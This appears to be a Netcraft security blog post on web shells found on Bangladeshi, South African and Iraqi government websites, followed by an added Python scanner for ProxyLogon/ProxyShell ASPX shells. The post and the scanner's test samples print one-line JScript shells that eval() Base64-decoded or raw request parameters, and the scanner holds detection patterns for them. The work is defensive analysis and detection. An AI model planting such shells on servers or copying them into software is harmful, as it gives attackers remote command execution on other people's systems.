Netcraft recently confirmed that a Bangladesh Army website hosts an Outlook Web Access (OWA) web shell. In addition, an OWA web shell was found on the Arts and Culture Department website for the South African province of KwaZulu-Natal, and an Iraqi government website was found to host a PHP web shell. Web shells are a common tool used by attackers to maintain control of a compromised web server, providing a web interface from which arbitrary commands can be executed on the server hosting the shell. OWA provides remote access to Microsoft Exchange mailboxes; since the ProxyLogon vulnerabilities were disclosed in March, Microsoft Exchange has become a popular target for cyber attacks.
When the web shell installed on the Arts and Culture Department website was visited in a browser, the malicious activity was not immediately apparent, as the shell impersonated a configuration dump. Web shells are most often buried in the file system alongside benign files, making it difficult for webmasters to identify and remove them. Even after the vulnerabilities used to install the shell have been patched, the shell itself must also be removed to stop further malicious activity; patching alone leaves the attacker's backdoor in place. Websites that contain web shells can therefore remain compromised for long periods of time.
AdminDisplayVersion : Version 15.1 (Build 2106.2)
Server : REDACTED
InternalUrl : https://REDACTED.local/OAB
InternalAuthenticationMethods : WindowsIntegrated
ExternalUrl : http://f/<script language="JScript" runat="server">
function Page_Load(){eval(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(
Request.Item["REDACTED"])),"unsafe");}</script>
ExternalAuthenticationMethods : WindowsIntegrated
AdminDisplayName :
ExchangeVersion : 0.10 (14.0.100.0)
DistinguishedName : REDACTED
Identity : REDACTEDOAB (Default Web Site)
Guid : REDACTED
ObjectCategory : REDACTED/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass : top
The source code for a similar OWA web shell is shown above. Near the middle of the file is a line of code that allows an attacker to execute an arbitrary command passed as a request parameter: the parameter value is Base64-decoded and handed to eval() in a server-side JScript block, so whatever the attacker sends is run as code on the Exchange server. For more information on OWA web shells and how to detect them, see our blog post about ProxyLogon shells.
Web shells on South African government sites are not a new phenomenon. Netcraft has previously identified 7 OWA web shells on hostnames below gov.za, as well as a PHP web shell. Alongside the PHP web shell on the South African government website was a defacement message. This defacement message was identical to one found on a hacked website linked to the Iraqi government, baghdadairport.gov.iq. The message names the criminals involved in the two compromises and an ICQ account that offers web shells for sale. The PHP web shell has now been removed, but the defacement remains. When the web shell was present, visiting baghdadairport.gov.iq in a browser revealed a login page characteristic of the WSO family ("web shell by oRb").
The Bangladesh Army site (newmail.army.mil.bd) was also found to host an OWA web shell installed using the ProxyShell vulnerabilities. This shell takes the form of an ASPX file starting with !BDN, the file signature of the Microsoft Outlook Personal Storage Table (PST) format, indicating that the shell was installed using the ProxyShell vulnerabilities disclosed earlier this year. ProxyShell exploitation typically abuses Exchange's mailbox export functionality to write the attacker's mailbox contents to disk as a PST file under a web-served path, so the resulting ASPX file begins with the PST header even though the web server will happily execute the script block embedded further in.
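The two indicators described above (an ASPX file that begins with the PST signature, and a server-side script block that hands request-supplied input to eval()) are simple enough to check mechanically. The following Python script is an added example, not Netcraft's tooling; it assumes a copy of the web root is available on the analysis machine, and the directory layout, file names and sample shell bodies it writes are constructed for the demonstration (the shell bodies mirror the shape of the OAB configuration dump quoted above).

```python
"""Heuristic scanner for ProxyLogon/ProxyShell-style ASPX web shells.

Added example, not Netcraft's tooling. It implements the two indicators the
post describes: a .aspx file that begins with the PST signature "!BDN", and a
server-side script block that eval()s request-supplied input. All paths and
sample files below are constructed for the demonstration.
"""
import os
import re
import tempfile

PST_MAGIC = b"!BDN"  # Outlook PST header; a web page should never start with it

# <script ... runat="server"> opens server-side code in an ASP.NET page
SCRIPT_BLOCK = re.compile(rb'<script[^>]*runat\s*=\s*"server"', re.IGNORECASE)
# eval( ... Request[ or Request.Item[ within one statement: request data run as code
EVAL_FROM_REQUEST = re.compile(
    rb'eval\s*\([^;]{0,300}?Request(?:\.Item)?\s*\[', re.IGNORECASE)


def classify(data: bytes) -> list:
    """Return the names of the indicators that fire on one file's contents."""
    findings = []
    if data.startswith(PST_MAGIC):
        findings.append("pst-header")    # ProxyShell mailbox-export artefact
    if SCRIPT_BLOCK.search(data) and EVAL_FROM_REQUEST.search(data):
        findings.append("eval-request")  # ProxyLogon-style one-line shell
    return findings


def scan(root: str, extensions=(".aspx", ".asp", ".ashx", ".asmx")) -> dict:
    """Walk a web root; map suspicious files ('/'-separated relative paths) to findings."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue  # only files the server will execute as code
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            findings = classify(data)
            if findings:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return hits


# Constructed samples: shell bodies follow the shape quoted in the post.
PROXYLOGON_SHELL = (
    b'ExternalUrl : http://f/<script language="JScript" runat="server">'
    b'function Page_Load(){eval(System.Text.Encoding.UTF8.GetString('
    b'System.Convert.FromBase64String(Request.Item["REDACTED"])),"unsafe");}</script>\r\n'
)
PROXYSHELL_SHELL = PST_MAGIC + b"\x00" * 60 + (
    b'<script language="JScript" runat="server">'
    b'function Page_Load(){eval(Request["cmd"],"unsafe");}</script>'
)
BENIGN_PAGE = (  # reads request data but never evaluates it as code
    b'<%@ Page Language="C#" %>\r\n<script runat="server">\r\n'
    b'void Page_Load(object sender, EventArgs e) { Label1.Text = Request["user"]; }\r\n'
    b'</script>\r\n<html><body><asp:Label id="Label1" runat="server" /></body></html>'
)

SAMPLE_TREE = {  # hypothetical layout, not a real server's
    "owa/auth/logon.aspx": BENIGN_PAGE,
    "owa/auth/oab.aspx": PROXYLOGON_SHELL,
    "aspnet_client/export.aspx": PROXYSHELL_SHELL,
    "owa/auth/readme.txt": PROXYLOGON_SHELL,  # not a scanned extension, so skipped
}


def build_sample_tree() -> str:
    """Write the constructed samples into a fresh temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, body in SAMPLE_TREE.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, findings in sorted(scan(build_sample_tree()).items()):
        print(f"{rel}: {', '.join(findings)}")
```

The patterns are deliberately narrow: they catch the one-line eval() shells seen in these campaigns but will miss obfuscated or differently structured ones, so treat the scanner as a triage aid, not proof of a clean server. Any hit should start a full incident response rather than a file deletion, since the attacker may have installed additional persistence. For the ProxyLogon variant in particular, the file on disk is generated from the OAB virtual directory configuration, so on a live Exchange server the ExternalUrl value reported by Get-OabVirtualDirectory in the Exchange Management Shell must be cleaned as well, or the shell will be written back.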
The nature of web shells makes identifying them a difficult task, as they are installed on obscure paths and produce output that looks benign. Fortunately, Netcraft is well equipped to deal with this problem. We provide cybercrime disruption services to 7 governments, and regularly scan the Internet for malicious content including phishing and malware. Hosting providers can subscribe to an alert service from Netcraft which will notify them whenever phishing, malware or web shells are detected in their infrastructure. Organizations targeted by high-volume phishing campaigns operated through web shells can use Netcraft's countermeasures service to disrupt the attacks.